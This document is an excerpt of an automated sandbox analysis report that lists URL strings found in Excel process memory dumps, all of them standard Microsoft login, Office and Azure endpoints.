    Source: EXCEL.EXE, 00000000.00000003.579371357.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497487929.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576896463.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.678241442.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505229587.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766929348.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.581187863.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637299838.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639236949.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619931841.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301191786.00000000134CF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576218623.00000000134C1000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeQj
    Source: EXCEL.EXE, 00000000.00000003.579371357.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497487929.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576896463.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.496815318.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.679242228.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576012897.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.678241442.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301289449.000000001335A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505229587.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766565007.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766929348.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.581187863.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637299838.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639236949.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619931841.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.756617656.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301191786.00000000134CF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576218623.00000000134C1000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeR
    Source: EXCEL.EXE, 00000000.00000003.579371357.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497487929.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576896463.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.678241442.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505229587.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766929348.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.581187863.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637299838.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639236949.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619931841.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301191786.00000000134CF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576218623.00000000134C1000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeS
    Source: EXCEL.EXE, 00000000.00000003.579371357.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497487929.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576896463.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.496815318.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.679242228.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576012897.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.678241442.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301289449.000000001335A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505229587.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766565007.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766929348.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.581187863.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637299838.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639236949.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619931841.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.756617656.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301191786.00000000134CF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576218623.00000000134C1000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize_
    Source: EXCEL.EXE, 00000000.00000003.579371357.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497487929.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576896463.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.678241442.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505229587.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766929348.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.581187863.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637299838.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639236949.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619931841.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301191786.00000000134CF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576218623.00000000134C1000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizec
    Source: EXCEL.EXE, 00000000.00000003.496815318.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.679242228.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576012897.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301289449.000000001335A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766565007.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.756617656.0000000013359000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizecom
    Source: EXCEL.EXE, 00000000.00000003.496815318.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.679242228.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576012897.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301289449.000000001335A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766565007.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.756617656.0000000013359000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizee
    Source: EXCEL.EXE, 00000000.00000003.579371357.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497487929.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576896463.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.678241442.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505229587.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766929348.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.581187863.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637299838.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639236949.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619931841.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301191786.00000000134CF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576218623.00000000134C1000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizei
    Source: EXCEL.EXE, 00000000.00000003.579371357.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497487929.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576896463.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.496815318.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.679242228.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576012897.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.678241442.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301289449.000000001335A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505229587.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766565007.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766929348.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.581187863.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637299838.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639236949.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619931841.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.756617656.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301191786.00000000134CF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576218623.00000000134C1000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeize
    Source: EXCEL.EXE, 00000000.00000003.579371357.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497487929.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576896463.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.678241442.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505229587.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766929348.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.581187863.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637299838.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639236949.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619931841.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301191786.00000000134CF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576218623.00000000134C1000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizel
    Source: EXCEL.EXE, 00000000.00000003.579371357.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497487929.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576896463.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.678241442.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505229587.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766929348.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.581187863.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637299838.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639236949.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619931841.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301191786.00000000134CF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576218623.00000000134C1000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizem
    Source: EXCEL.EXE, 00000000.00000003.496815318.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.679242228.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576012897.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301289449.000000001335A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766565007.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.756617656.0000000013359000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizen
    Source: EXCEL.EXE, 00000000.00000003.579371357.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497487929.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576896463.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.496815318.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.679242228.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576012897.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.678241442.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301289449.000000001335A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505229587.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766565007.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766929348.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.581187863.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637299838.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639236949.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619931841.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.756617656.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301191786.00000000134CF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576218623.00000000134C1000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeo
    Source: EXCEL.EXE, 00000000.00000003.579371357.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497487929.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576896463.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.678241442.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505229587.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766929348.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.581187863.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637299838.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639236949.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619931841.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301191786.00000000134CF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576218623.00000000134C1000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizer
    Source: EXCEL.EXE, 00000000.00000003.579371357.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497487929.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576896463.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.678241442.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505229587.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766929348.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.581187863.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637299838.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639236949.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619931841.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301191786.00000000134CF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576218623.00000000134C1000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizesj
    Source: EXCEL.EXE, 00000000.00000003.496815318.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.679242228.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576012897.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301289449.000000001335A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766565007.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.756617656.0000000013359000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizet
    Source: EXCEL.EXE, 00000000.00000003.496815318.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.679242228.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576012897.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301289449.000000001335A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766565007.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.756617656.0000000013359000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeu
    Source: EXCEL.EXE, 00000000.00000003.579371357.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497487929.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576896463.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.496815318.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.679242228.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576012897.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.678241442.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301289449.000000001335A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505229587.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766565007.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766929348.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.581187863.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637299838.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639236949.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619931841.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.756617656.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301191786.00000000134CF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576218623.00000000134C1000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizex
    Source: EXCEL.EXE, 00000000.00000003.579371357.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497487929.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576896463.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.496815318.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.679242228.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576012897.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.678241442.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301289449.000000001335A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505229587.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766565007.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766929348.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.581187863.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637299838.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639236949.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619931841.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.756617656.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301191786.00000000134CF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576218623.00000000134C1000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizey
    Source: EXCEL.EXE, 00000000.00000003.496815318.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.679242228.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576012897.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301289449.000000001335A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766565007.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.756617656.0000000013359000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizez
    Source: EXCEL.EXE, 00000000.00000003.579371357.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497487929.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576896463.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.496815318.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.679242228.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576012897.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.678241442.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301289449.000000001335A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505229587.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766565007.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766929348.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.581187863.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637299838.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639236949.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619931841.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.756617656.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301191786.00000000134CF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576218623.00000000134C1000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize~
    Source: 7A7D450E-0610-43BD-BE93-0BD5327AEEE8.0.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
    Source: EXCEL.EXE, 00000000.00000003.579371357.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497487929.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576896463.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.678241442.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505229587.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766929348.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.581187863.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637299838.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639236949.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619931841.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301191786.00000000134CF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576218623.00000000134C1000.00000004.00000001.sdmpString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/#
    Source: EXCEL.EXE, 00000000.00000003.579371357.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497487929.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576896463.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.678241442.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505229587.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766929348.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.581187863.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637299838.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639236949.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619931841.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301191786.00000000134CF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576218623.00000000134C1000.00000004.00000001.sdmp, 7A7D450E-0610-43BD-BE93-0BD5327AEEE8.0.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
    Source: EXCEL.EXE, 00000000.00000003.301167821.0000000013497000.00000004.00000001.sdmpString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1MBI_SSL_SHORT
    Source: EXCEL.EXE, 00000000.00000003.579371357.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497487929.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576896463.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.678241442.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505229587.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766929348.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.581187863.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637299838.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639236949.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619931841.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301191786.00000000134CF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576218623.00000000134C1000.00000004.00000001.sdmp, 7A7D450E-0610-43BD-BE93-0BD5327AEEE8.0.drString found in binary or memory: https://management.azure.com
    Source: EXCEL.EXE, 00000000.00000003.579371357.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497487929.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576896463.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.678241442.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505229587.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766929348.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.581187863.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637299838.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639236949.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619931841.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301191786.00000000134CF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576218623.00000000134C1000.00000004.00000001.sdmp, 7A7D450E-0610-43BD-BE93-0BD5327AEEE8.0.drString found in binary or memory: https://management.azure.com/
    Source: EXCEL.EXE, 00000000.00000003.301167821.0000000013497000.00000004.00000001.sdmpString found in binary or memory: https://management.azure.com/BingGeospatialEndpointServiceUrlhttps://dev.virtualearth.net/REST/V1/Ge
    Source: EXCEL.EXE, 00000000.00000003.576218623.00000000134C1000.00000004.00000001.sdmp, 7A7D450E-0610-43BD-BE93-0BD5327AEEE8.0.drString found in binary or memory: https://messaging.office.com/
